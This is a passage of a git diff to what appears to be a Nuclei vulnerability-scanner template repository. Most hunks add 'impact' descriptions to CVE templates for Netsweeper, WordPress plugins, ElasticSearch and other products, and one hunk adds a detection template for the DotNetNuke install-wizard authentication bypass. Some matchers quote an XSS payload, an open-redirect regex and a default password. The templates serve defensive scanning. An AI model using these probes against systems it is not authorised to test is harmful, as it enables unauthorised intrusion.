   description: Multiple cross-site scripting vulnerabilities in Netsweeper before 3.1.10, 4.0.x before 4.0.9, and 4.1.x before 4.1.2 allow remote attackers to inject arbitrary web script or HTML via the (1) server parameter to remotereporter/load_logfiles.php, (2) customctid parameter to webadmin/policy/category_table_ajax.php, (3) urllist parameter to webadmin/alert/alert.php, (4) QUERY_STRING to webadmin/ajaxfilemanager/ajax_get_file_listing.php, or (5) PATH_INFO to webadmin/policy/policy_table_ajax.php/.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the targeted user's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Apply the latest security patches or updates provided by the vendor to mitigate this vulnerability.
   reference:
@@ -45,4 +47,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a004730450221009ae189cd5af5aa43d27047febc47eaa6ea32940bdfd7979d57fe8698db3da1e00220759465b94febbbbc13eb934cb3e2625f4c1b9b5ce67fd22534891d0535a70345:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022056dcc0390d45153fa955d06630597ce895fffc7b0422c2f41513c6340ab3b891022100ae24a085d4d6f78661be66936879fb7d22fe3986a7235c90bbe94a4b1e1fb99d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2014/CVE-2014-9607.yaml b/http/cves/2014/CVE-2014-9607.yaml
index 055e110c72..6b2e3c8af0 100644
--- a/http/cves/2014/CVE-2014-9607.yaml
+++ b/http/cves/2014/CVE-2014-9607.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: medium
   description: A cross-site scripting vulnerability in remotereporter/load_logfiles.php in Netsweeper 4.0.3 and 4.0.4 allows remote attackers to inject arbitrary web script or HTML via the url parameter.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the targeted user's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Apply the latest security patches or updates provided by the vendor to mitigate this vulnerability.
   reference:
@@ -45,4 +47,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100bca20b944344499409014a35af1b06f0ad1a59b02cc6081a328924f1a219384a022100bc3d33276e65bdc9dfef321758adefcac6e4f5a12429a32a4a77751e0cf0c48a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a004730450220122b6dcfe5f4522732188a18dc70d5948ed467ff9ddb9baf9016178978dad972022100e54b1f0c076e3d1a27891fe239997f11a438c12257ef95b5aeb16dd380322c53:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2014/CVE-2014-9608.yaml b/http/cves/2014/CVE-2014-9608.yaml
index 8cebec4697..4cdf4b7ca7 100644
--- a/http/cves/2014/CVE-2014-9608.yaml
+++ b/http/cves/2014/CVE-2014-9608.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     A cross-site scripting vulnerability in webadmin/policy/group_table_ajax.php/ in Netsweeper before 3.1.10, 4.0.x before 4.0.9, and 4.1.x before 4.1.2 allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the targeted user's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Apply the latest security patches or updates provided by the vendor to mitigate this vulnerability.
   reference:
@@ -53,4 +55,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022055526a65116b7e4712ec3d55bd6b0a7070c4c664ba7b54b4d29a760b4b659cf5022100964713a6663f8706e4f5ed8105bfb43c934bf0fcda75baa546f27ccec13d8655:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402204ff648e6238e67cdb5fc307d65f684556ccfaccab142ffbad15d6195b675192902204d8a2dc6b14a71a9e0cd2f96d657bbf4f6047e0debe0bd8cb83452e994b23ff8:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2014/CVE-2014-9609.yaml b/http/cves/2014/CVE-2014-9609.yaml
index a93f1518e9..a255366ae5 100644
--- a/http/cves/2014/CVE-2014-9609.yaml
+++ b/http/cves/2014/CVE-2014-9609.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: medium
   description: A directory traversal vulnerability in webadmin/reporter/view_server_log.php in Netsweeper before 3.1.10, 4.0.x before 4.0.9, and 4.1.x before 4.1.2 allows remote attackers to list directory contents via a .. (dot dot) in the log parameter in a stats action.
+  impact: |
+    An attacker can read, modify, or delete arbitrary files on the server, potentially leading to unauthorized access, data leakage, or system compromise.
   remediation: |
     Upgrade to a patched version of Netsweeper or apply the necessary security patches to fix the directory traversal vulnerability.
   reference:
@@ -39,4 +41,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a0047304502201af493fde516f9094af1681c6689949afbcfa3cebde2de9017511818e58d3a55022100b3d29a75add22604b61f03ac327895c02f2a8d5a8d11cc3fc6d617c0b571084e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100f70c3aa6317938267f7df4b25f5ef6c9c78bc137aad2691873d6ec24424a201b022100cb7ff2bf016f58396ddb7c976eceb4c2c310c98f03b888098a9107220dda82ee:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2014/CVE-2014-9614.yaml b/http/cves/2014/CVE-2014-9614.yaml
index c92300e2ee..45d2332e61 100644
--- a/http/cves/2014/CVE-2014-9614.yaml
+++ b/http/cves/2014/CVE-2014-9614.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: critical
   description: The Web Panel in Netsweeper before 4.0.5 has a default password of 'branding' for the branding account, which makes it easier for remote attackers to obtain access via a request to webadmin/.
+  impact: |
+    An attacker can gain unauthorized access to the Netsweeper 4.0.5 system using the default weak account.
   remediation: |
     Change the default credentials to strong and unique ones.
   reference:
@@ -52,4 +54,4 @@ http:
       - type: status
         status:
           - 302
-# digest: 4b0a0048304602210092892862226ac7371f1ca72750544b0136d9c89215fbc496f965455ff8f0b01f022100b96a767027a7923d95b7ac68ea4c1995acd1c789ee59e8c95c2bfd5e3bc6c65c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a004730450220634f26c8fa6d2ec9d449a59b9286d363caeb2f415a4ff5b8a1939ae4378edf20022100c2e721fe5682e209ef6ed66bd754070d8eb6ca353d9f2239503847a1ff73630f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2014/CVE-2014-9615.yaml b/http/cves/2014/CVE-2014-9615.yaml
index a4eefe21ff..c891e01855 100644
--- a/http/cves/2014/CVE-2014-9615.yaml
+++ b/http/cves/2014/CVE-2014-9615.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: medium
   description: A cross-site scripting vulnerability in Netsweeper 4.0.4 allows remote attackers to inject arbitrary web script or HTML via the url parameter to webadmin/deny/index.php.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Apply the latest security patches or updates provided by the vendor to mitigate this vulnerability.
   reference:
@@ -45,4 +47,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a004730450220488a16c374aeb45bab5c827ad120d9c13084dfad06426dd9bba3bab2405b46ff022100b2fd0785b8c24fae166a765419cd877459478e943ecd2f00aac465a6c0f73ff9:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402201a76cdd473461e509a8c694cd5fc5f1331a157991083e118aa0f8ad790c33f4f022023ddd15dcd8e872fd2dfa54b109481b94ccf553e63001fee7e65d1650c98d231:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2014/CVE-2014-9617.yaml b/http/cves/2014/CVE-2014-9617.yaml
index 8282a02a56..8b13e03998 100644
--- a/http/cves/2014/CVE-2014-9617.yaml
+++ b/http/cves/2014/CVE-2014-9617.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: medium
   description: An open redirect vulnerability in remotereporter/load_logfiles.php in Netsweeper before 4.0.5 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the url parameter.
+  impact: |
+    An attacker can exploit this vulnerability to redirect users to malicious websites, leading to potential phishing attacks or the download of malware.
   remediation: |
     Apply the latest security patches or updates provided by the vendor to fix the open redirection vulnerability.
   reference:
@@ -35,4 +37,4 @@ http:
         part: header
         regex:
           - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
-# digest: 4a0a0047304502205f2e9107e85a5270339649b0af912cfe7d8a52067a645b2e6ca1f6e38aaf6276022100f8c58d5a33ef35a9e240d901f2956915c0bbb7c3ed62970bf52ff9e64f8157ca:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022017b30983b8c743e91bcf35aa59a0373279479cb97829ab74c934b545b5d2382f022100f1640cf0fcd3ec60747214ab6b910ac01ef92f7dd10b7902844c422c1abf8337:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2014/CVE-2014-9618.yaml b/http/cves/2014/CVE-2014-9618.yaml
index dd0e9307f8..a95fd3fa6a 100644
--- a/http/cves/2014/CVE-2014-9618.yaml
+++ b/http/cves/2014/CVE-2014-9618.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     The Client Filter Admin portal in Netsweeper before 3.1.10, 4.0.x before 4.0.9, and 4.1.x before 4.1.2 allows remote attackers to bypass authentication and subsequently create arbitrary profiles via a showdeny action to the default URL.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information and potential compromise of the system.
   remediation: |
     Apply the latest security patches or updates provided by the vendor to fix the authentication bypass vulnerability in Netsweeper.
   reference:
@@ -45,4 +47,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100a78ac37aae81c40a0197e6971546ca001549708488859c2bd10071dfa49950b5022100dbb2d3671ce3c3e0df4afb924fd5be9f7205234cc2dc12aa27e1367855267a46:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502210085c810aa7820426b4ceef16028597acca8da44f021fd8ec683fe8e119bdc2b3502205235942e4b4021456f06c3ad2fc1aa25cb894521372d46fab753b883e3d30a94:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2015/CVE-2015-0554.yaml b/http/cves/2015/CVE-2015-0554.yaml
index 41aa91b6ab..40e9571c47 100644
--- a/http/cves/2015/CVE-2015-0554.yaml
+++ b/http/cves/2015/CVE-2015-0554.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: critical
   description: ADB (formerly Pirelli Broadband Solutions) P.DGA4001N router with firmware PDG_TEF_SP_4.06L.6 does not properly restrict access to the web interface, which allows remote attackers to obtain sensitive information or cause a denial of service (device restart) as demonstrated by a direct request to (1) wlsecurity.html or (2) resetrouter.html.
+  impact: |
+    An attacker can exploit this vulnerability to gain sensitive information from the router.
   remediation: |
     Apply the latest firmware update provided by the vendor to fix the information disclosure vulnerability.
   reference:
@@ -44,4 +46,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100ff2c6e3e2fda3a5cd47809d841d8d1d9d2984161d313621f84a2a3880b3c5a4202207e3a919fd238d10dba9bca36e745600b990ab270356e4b1dfe5cb77c569aaddc:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100b1a27abebb2eae51634e7a91f11cb3711eae32924f5d273d9edfa803cb8ed04f022100a011c773c5fa1b25453891177e5e62bc343d0a16836db2e2733adb89e4bd9e95:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2015/CVE-2015-1000005.yaml b/http/cves/2015/CVE-2015-1000005.yaml
index 2921485571..ed924e1d46 100644
--- a/http/cves/2015/CVE-2015-1000005.yaml
+++ b/http/cves/2015/CVE-2015-1000005.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     WordPress Candidate Application Form <= 1.3 is susceptible to arbitrary file downloads because the code in downloadpdffile.php does not do any sanity checks.
+  impact: |
+    An attacker can exploit this vulnerability to read sensitive files on the server.
   remediation: |
     Update to the latest version of the plugin.
   reference:
@@ -41,4 +43,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100b298f97f92e10754192aaf2c1917f2aa5a8e5c5345d6d58266e81e5cbbcc92c8022022a3c070f02a0b6e3390eca8db86d363d3668b96e27d951cf7e524fbedd6c876:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022046ca4a1f3180802280ba339f44fc52f3e4365a1e4d287e55c58402e382b22da2022100e3259ddb7029f93ad7e2f091dcfdb4bed79cd95543043ec65ea523eb1644c3be:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2015/CVE-2015-1000010.yaml b/http/cves/2015/CVE-2015-1000010.yaml
index 517b0c983c..379b30606c 100644
--- a/http/cves/2015/CVE-2015-1000010.yaml
+++ b/http/cves/2015/CVE-2015-1000010.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     WordPress Simple Image Manipulator 1.0 is vulnerable to local file inclusion in ./simple-image-manipulator/controller/download.php  because no checks are made to authenticate users or sanitize input when determining file location.
+  impact: |
+    An attacker can exploit this vulnerability to read arbitrary files on the server.
   remediation: |
     Update to the latest version of the WordPress Simple Image Manipulator plugin.
   reference:
@@ -42,4 +44,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a0047304502203993229beec1f7695b0e4f1cffd7bc80cf9e956feab988e99ab8ab5635b9bdb3022100c6a72f6bf61ed5f9d3ec8f475b55a56ec81e2ff02d8319ebbaaf7a49314101f0:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402202549d83eabfce63917a376c0fcb0b442a9c32468df225270a14f80c7f7e2bc7602201cd07be85b2da7e697826f196a567384dabda36d6d2ff6e7ace29538494d504e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2015/CVE-2015-1000012.yaml b/http/cves/2015/CVE-2015-1000012.yaml
index 5f32bef737..7bb0f2724e 100644
--- a/http/cves/2015/CVE-2015-1000012.yaml
+++ b/http/cves/2015/CVE-2015-1000012.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: high
   description: WordPress MyPixs 0.3 and prior contains a local file inclusion vulnerability.
+  impact: |
+    An attacker can exploit this vulnerability to read sensitive files, execute arbitrary code, or gain unauthorized access to the server.
   remediation: |
     Update to the latest version of the MyPixs plugin (>=0.4) or apply the vendor-provided patch to fix the LFI vulnerability.
   reference:
@@ -43,4 +45,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100d4c354c1f9a50bc30447ffbf50dcee312d26257c5fc73517cd29ed268c6dfb2f02203f01555fc878b26d3f50874391dbb07c62999ab2909e8ede423038c9c08cbc33:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100dc820f1cc4d333d47e830dbf6be78240f2337113217ead7b6eb84e5cc919740202202ac8c875884b9bf8975d52d2e50a790ab90f8579ebd301930eebc60802b858b3:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2015/CVE-2015-1427.yaml b/http/cves/2015/CVE-2015-1427.yaml
index 25b0f5c969..ad69e1dce4 100644
--- a/http/cves/2015/CVE-2015-1427.yaml
+++ b/http/cves/2015/CVE-2015-1427.yaml
@@ -5,6 +5,8 @@ info:
   author: pikpikcu
   severity: high
   description: ElasticSearch before 1.3.8 and 1.4.x before 1.4.3 allows remote attackers to bypass the sandbox protection mechanism and execute arbitrary shell commands via a crafted script to the Groovy scripting engine.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
   remediation: |
     Apply the latest security patches and updates provided by ElasticSearch to fix the deserialization vulnerability.
   reference:
@@ -62,4 +64,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a0047304502210093e2da05528c9a4fafd6a1ed1392853fa6f6875de04fe91d079a6da6225db28f022018f337b647a4b0c8965f6e91b33f2e9f83548f9457a946384866c4e9aea5351a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022040272f4f73c81bc79bc2d61668da04e69f10ea7be6b3c2b0dafd4f969e0a0e09022100ed604e0dbf6c545d62974b22c016108152f583e5f7d29b378dde0927cb7a80ed:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2015/CVE-2015-1503.yaml b/http/cves/2015/CVE-2015-1503.yaml
index de388594b5..4d92c3fe50 100644
--- a/http/cves/2015/CVE-2015-1503.yaml
+++ b/http/cves/2015/CVE-2015-1503.yaml
@@ -5,6 +5,8 @@ info:
   author: 0x_Akoko
   severity: high
   description: IceWarp Mail Server versions prior to 11.1.1 suffer from a directory traversal vulnerability.
+  impact: |
+    An attacker can access sensitive files on the server, potentially leading to unauthorized access, data leakage, or further exploitation.
   remediation: |
     Upgrade IceWarp Mail Server to version 11.1.1 or above to mitigate the directory traversal vulnerability.
   reference:
@@ -42,4 +44,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100dfac8e782a5e97020357ac7b41f34657d7013c37373a957d1fd87e8644a8fd70022057da08e320904635130f717b7d73de3c2a0cd37cd4681f7f2a1b4f421fde0830:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100875b5497eb3adbce2c3f606fd17d363e6ea418f870fea75120ca19e89a857a610221009cfb2345bbd891da8aab5ee1f5031a2aef3ae10c271ccbe46706cc994de7eff5:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2015/CVE-2015-1579.yaml b/http/cves/2015/CVE-2015-1579.yaml
index fd25fdd130..e0a4128139 100644
--- a/http/cves/2015/CVE-2015-1579.yaml
+++ b/http/cves/2015/CVE-2015-1579.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     Directory traversal vulnerability in the Elegant Themes Divi theme for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the img parameter in a revslider_show_image action to wp-admin/admin-ajax.php. NOTE: this vulnerability may be a duplicate of CVE-2014-9734.
+  impact: |
+    An attacker can read arbitrary files on the server, potentially exposing sensitive information.
   remediation: |
     Update the WordPress Slider Revolution plugin to the latest version to fix the vulnerability.
   reference:
@@ -51,4 +53,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a0047304502210092ff76edbbc2efb77680a8e6c8f22a526cd13cab037b1b2536987549254a07f502204f4200b2e29e0e1f769b025c831666a45a105b15733125b6da657175a8dfc9ad:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100f352842c7a3cd215aae483270498605cdbda68e467a8be660ca710ad4934758802201612aca609617c4e58259bbee9e6dacd254abd5fffd41148364a865fe71e2fdb:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2015/CVE-2015-1880.yaml b/http/cves/2015/CVE-2015-1880.yaml
index a933aa4f42..c466aac4d6 100644
--- a/http/cves/2015/CVE-2015-1880.yaml
+++ b/http/cves/2015/CVE-2015-1880.yaml
@@ -5,6 +5,8 @@ info:
   author: pikpikcu
   severity: medium
   description: Fortinet FortiOS 5.2.x before 5.2.3 contains a cross-site scripting vulnerability in the SSL VPN login page which allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Upgrade Fortinet FortiOS to a version higher than 5.2.3 to mitigate this vulnerability.
   reference:
@@ -47,4 +49,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a0046304402201a01ffbf0346b2002aff666896e97ba836bee1816d78bad5340adf7ebc0aacee022048fa05e1020fe16d8938b501e240256ff2700cb98ed14f9f7fdfa316f9ba75fd:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100a8f1b536bbc0034081dc6470fc912055f6a4ba87d655cfff8340f1c73d52ffda022100b490dca5de2ecd3c8f5e5c1ceea38d54db1cf0ec018a27fca4a09200c7e40fd1:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2015/CVE-2015-2067.yaml b/http/cves/2015/CVE-2015-2067.yaml
index eb10bf6da3..8949bbf278 100644
--- a/http/cves/2015/CVE-2015-2067.yaml
+++ b/http/cves/2015/CVE-2015-2067.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: medium
   description: Magento Server MAGMI (aka Magento Mass Importer) contains a directory traversal vulnerability in web/ajax_pluginconf.php. that allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter.
+  impact: |
+    An attacker can exploit this vulnerability to read arbitrary files on the server.
   remediation: |
     Apply the latest security patches and updates provided by Magento.
   reference:
@@ -41,4 +43,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a0047304502202797036fe9b48e9a099e90daf5584af453b174dd7235ab9c6617d840a2137bbd022100a357a9ee800bd4a263d5a1e5954e9cb25511ba46bcb07bbf6b68f4560a1af392:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100a09010f5b9f4018e4fc0c383188174604fd390338eba8999b15cddc572fb3aef022100879ae7ef25dfb610b1d2c23646b71404ce647cadd8a6f66212a51815f9847542:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2015/CVE-2015-2068.yaml b/http/cves/2015/CVE-2015-2068.yaml
index c7a037a47b..d7e391a72c 100644
--- a/http/cves/2015/CVE-2015-2068.yaml
+++ b/http/cves/2015/CVE-2015-2068.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: medium
   description: Magento Server Mass Importer plugin contains multiple cross-site scripting vulnerabilities which allow remote attackers to inject arbitrary web script or HTML via the (1) profile parameter to web/magmi.php or (2) QUERY_STRING to web/magmi_import_run.php.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected Magento server.
   remediation: |
     Apply the latest security patches provided by Magento to fix the XSS vulnerability in the Server Mass Importer module.
   reference:
@@ -48,4 +50,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100ddeefc9ff01c4b9b168885e2d426c362cf2a7246658e3198b4e2ea60b20359b0022004062dbc38a55101765d8337c2c8eb1a8dc3917bb3ed992d2a68bc8f3c6a743d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502210088f200b0e4e5251452929ffe746143a17733fef1673f2d5e507b73163a40da32022058daf619169fae1454b37d82b9eb25d92d39df2081ee24dd0b288d597566d58e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2015/CVE-2015-2166.yaml b/http/cves/2015/CVE-2015-2166.yaml
index 23d17e8b46..5b19002618 100644
--- a/http/cves/2015/CVE-2015-2166.yaml
+++ b/http/cves/2015/CVE-2015-2166.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: medium
   description: Ericsson Drutt Mobile Service Delivery Platform (MSDP) 4, 5, and 6 allows remote attackers to read arbitrary files via a ..%2f (dot dot encoded slash) in the default URI in the Instance Monitor.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, potentially leading to unauthorized access or information disclosure.
   remediation: |
     Apply the latest security patches or updates provided by the vendor to fix the LFI vulnerability in the Ericsson Drutt MSDP application.
   reference:
@@ -41,4 +43,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100ecdc8c1cf6ee2df90852ed2a58f5f9911b2639daca90b2f2a73313a1e19d2a36022100d01dc7cc3bf63079f1c6c83147e159ad221bcf55b04eff087399a6d80f1b8aeb:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100dcc1878b9e96a07a63c2e7f707765d75859d430217f6da0c8df5ef5a81e908ee02203f95e514f816093a524a369721a6d66127b324453797366058f5fe8fa831c6a1:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2015/CVE-2015-2196.yaml b/http/cves/2015/CVE-2015-2196.yaml
index 6678c4c242..40d2f4671d 100644
--- a/http/cves/2015/CVE-2015-2196.yaml
+++ b/http/cves/2015/CVE-2015-2196.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     WordPress Spider Calendar plugin through 1.4.9 is susceptible to SQL injection. An attacker can execute arbitrary SQL commands via the cat_id parameter in a spiderbigcalendar_month action to wp-admin/admin-ajax.php, thus making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or complete compromise of the WordPress site.
   remediation: Fixed in version 1.4.14.
   reference:
     - https://wpscan.com/vulnerability/8d436356-37f8-455e-99b3-effe8d0e3cad
@@ -42,4 +44,4 @@ http:
           - 'status_code == 200'
           - 'contains(body, "{\"status\":true,\"data\"")'
         condition: and
-# digest: 4a0a00473045022100b631f3a0da2cd2cd984f22c6a14db604ee8e9be6cd826fd16d2710cc716e57e402202c0110d83e9c8530cd1de900371d5f2840bc2ed649a8ca5cd8c65081aa6373e4:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100ca88241cb70b786eebd10dadef7fc3c2a36f394c9fb81a63d45dcc5c0424be5b02205c88b91297a57c8adc0ae833c3cdf85452d48eab99516a27cf9f7e608ec60fe7:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2015/CVE-2015-2755.yaml b/http/cves/2015/CVE-2015-2755.yaml
index 764fc047d5..dcd3cf0360 100644
--- a/http/cves/2015/CVE-2015-2755.yaml
+++ b/http/cves/2015/CVE-2015-2755.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     WordPress AB Google Map Travel plugin through 3.4 contains multiple stored cross-site scripting vulnerabilities. The plugin allows an attacker to hijack the administrator authentication for requests via the (1) lat (Latitude), (2) long (Longitude), (3) map_width, (4) map_height, or (5) zoom (Map Zoom) parameters in the ab_map_options page to wp-admin/admin.php.
+  impact: |
+    Successful exploitation of this vulnerability allows an attacker to inject malicious scripts into the website, potentially leading to unauthorized access, data theft, or defacement.
   remediation: |
     Update to the latest version of the AB Google Map Travel plugin (>=3.5) or apply the vendor-supplied patch to mitigate this vulnerability.
   reference:
@@ -54,4 +56,4 @@ http:
           - 'contains(body_2, "<script>+-+-1-+-+alert(document.domain)</script>")'
           - 'contains(body_2, "ab-google-map-travel")'
         condition: and
-# digest: 490a00463044022056dff0143b404385394c04a02b748622b19c91c5bcc7e475b2b7ea7d07eab66f022017f6dc12069c7fadb8e9d7736a967b8b77eed9e34da2afbe201c0ee8b75dbefd:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502204b237870e6c6db8b6116c32384c5508d3d240e024b1e043a790c2c7eec2f6abe022100aa806c4f701a9211b8d7d8fcb26567a9f0745735b2dabf6c98404b4a699c9af6:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2015/CVE-2015-2794.yaml b/http/cves/2015/CVE-2015-2794.yaml
new file mode 100644
index 0000000000..fe3ac288a1
--- /dev/null
+++ b/http/cves/2015/CVE-2015-2794.yaml
@@ -0,0 +1,45 @@
+id: CVE-2015-2794
+
+info:
+  name: DotNetNuke 07.04.00 - Administration Authentication Bypass
+  author: 1337kro
+  severity: critical
+  description: |
+    The installation wizard in DotNetNuke (DNN) before 7.4.1 allows remote attackers to reinstall the application and gain SuperUser access via a direct request to Install/InstallWizard.aspx.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2015-2794
+    - https://www.exploit-db.com/exploits/39777
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2015-2794
+    cwe-id: CWE-264
+    epss-score: 0.9711
+    epss-percentile: 0.99736
+    cpe: cpe:2.3:a:dotnetnuke:dotnetnuke:*:*:*:*:*:*:*:*
+  metadata:
+    max-request: 1
+    vendor: dotnetnuke
+    product: dotnetnuke
+    verified: true
+    fofo-query: app="DotNetNuke"
+  tags: cve,cve2015,dotnetnuke,auth-bypass,install
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/Install/InstallWizard.aspx?__VIEWSTATE"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "Administrative Information"
+          - "Database Information"
+        condition: and
+
+      - type: status
+        status:
+          - 200
+# digest: 490a0046304402201158c001259e4db42e4a00041d56cb95363728da7170e407c3c0d99701f0f426022078549a7f4b8f1aca49f2e0c6dd0849c52df6812d9e901daa10b925a59aea47c3:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2015/CVE-2015-2807.yaml b/http/cves/2015/CVE-2015-2807.yaml
index 15be2fab13..416ca5e50a 100644
--- a/http/cves/2015/CVE-2015-2807.yaml
+++ b/http/cves/2015/CVE-2015-2807.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: medium
   description: Navis DocumentCloud plugin before 0.1.1 for WordPress contains a reflected cross-site scripting vulnerability in js/window.php which allows remote attackers to inject arbitrary web script or HTML via the wpbase parameter.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected website.
   remediation: |
